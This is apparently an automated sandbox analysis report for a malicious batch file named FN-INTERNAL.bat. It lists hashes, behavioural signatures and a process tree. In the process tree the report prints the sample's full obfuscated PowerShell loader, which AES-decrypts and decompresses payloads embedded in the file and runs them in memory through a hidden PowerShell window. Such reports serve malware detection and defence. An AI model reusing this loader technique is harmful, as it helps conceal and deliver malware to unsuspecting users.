Analysis
max time kernel
1561s
max time network
1562s
platform
windows7_x64
resource
win7-20240508-en
resource tags
arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
submitted
26-05-2024 14:55
Static task
static1
Behavioral task
behavioral1
Sample
FN-INTERNAL.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
FN-INTERNAL.bat
Resource
win7-20240508-en
Behavioral task
behavioral3
Sample
FN-INTERNAL.bat
Resource
win10v2004-20240508-en
General
Target
FN-INTERNAL.bat
Size
376KB
MD5
121a69448e9f5eef0ba4c1229b471208
SHA1
90abf42b20fb75a7f922b4a83cbeb77ca5dbf5d0
SHA256
b383a0ab3670e505ae0b7a7b6d68c096bb799ce858d8afc2e2ef5d1c1314051a
SHA512
c9e903245c3ab434018e23e4c51bf9d4fcbdb9dc1b85114574c12a2ce5c3ec6cd811fa1b51a34c86c695c6ba79cade1cdc215c4953090a342ba4ff6c1a92bc3d
SSDEEP
6144:C+g8ai0m+BiS0FY9tRpUOAIeJxsOjzW1JlW5nHa5EV8hpzjHRQbh9xph9aK7PGaj:C+gdOSOYbRHjeJxbOJlW5niJSdT9amGk
Malware Config
Signatures
Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
Run Powershell and hide display window.

Suspicious behavior: EnumeratesProcesses (1 IoCs)
Processes:
pid   process
1196  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
Processes:
description              pid   process
Token: SeDebugPrivilege  1196  powershell.exe

Suspicious use of WriteProcessMemory (9 IoCs)
Processes:
description                        pid   process  target process
PID 1284 wrote to memory of 1148   1284  cmd.exe  cmd.exe
PID 1284 wrote to memory of 1148   1284  cmd.exe  cmd.exe
PID 1284 wrote to memory of 1148   1284  cmd.exe  cmd.exe
PID 1284 wrote to memory of 1144   1284  cmd.exe  cmd.exe
PID 1284 wrote to memory of 1144   1284  cmd.exe  cmd.exe
PID 1284 wrote to memory of 1144   1284  cmd.exe  cmd.exe
PID 1284 wrote to memory of 1196   1284  cmd.exe  powershell.exe
PID 1284 wrote to memory of 1196   1284  cmd.exe  powershell.exe
PID 1284 wrote to memory of 1196   1284  cmd.exe  powershell.exe
Processes
C:\Windows\system32\cmd.exe
  command: cmd /c "C:\Users\Admin\AppData\Local\Temp\FN-INTERNAL.bat"
  PID: 1284
  signatures: Suspicious use of WriteProcessMemory

  C:\Windows\system32\cmd.exe
    command: cmd /c "set __=^&rem"
    PID: 1148

  C:\Windows\system32\cmd.exe
    command: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('97S5HKOOEHVTK1tx3yu5lTndq7VoLhaiBMi1fQ7XC/w='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BY/5WS5SKbagLrml3T2b0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ERsLU=New-Object System.IO.MemoryStream(,$param_var); $BcZuZ=New-Object System.IO.MemoryStream; $aYIjw=New-Object System.IO.Compression.GZipStream($ERsLU, [IO.Compression.CompressionMode]::Decompress); $aYIjw.CopyTo($BcZuZ); $aYIjw.Dispose(); $ERsLU.Dispose(); $BcZuZ.Dispose(); $BcZuZ.ToArray();}function execute_function($param_var,$param2_var){ $WzoGX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uXAck=$WzoGX.EntryPoint; $uXAck.Invoke($null, $param2_var);}$FVRVU = 'C:\Users\Admin\AppData\Local\Temp\FN-INTERNAL.bat';$host.UI.RawUI.WindowTitle = $FVRVU;$gLqRi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($FVRVU).Split([Environment]::NewLine);foreach ($pQPCS in $gLqRi) { if ($pQPCS.StartsWith('VPEeCHQfOWHyYXzmlFZZ')) { $YmBxU=$pQPCS.Substring(20); break; }}$payloads_var=[string[]]$YmBxU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    PID: 1144

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
    PID: 1196
    signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken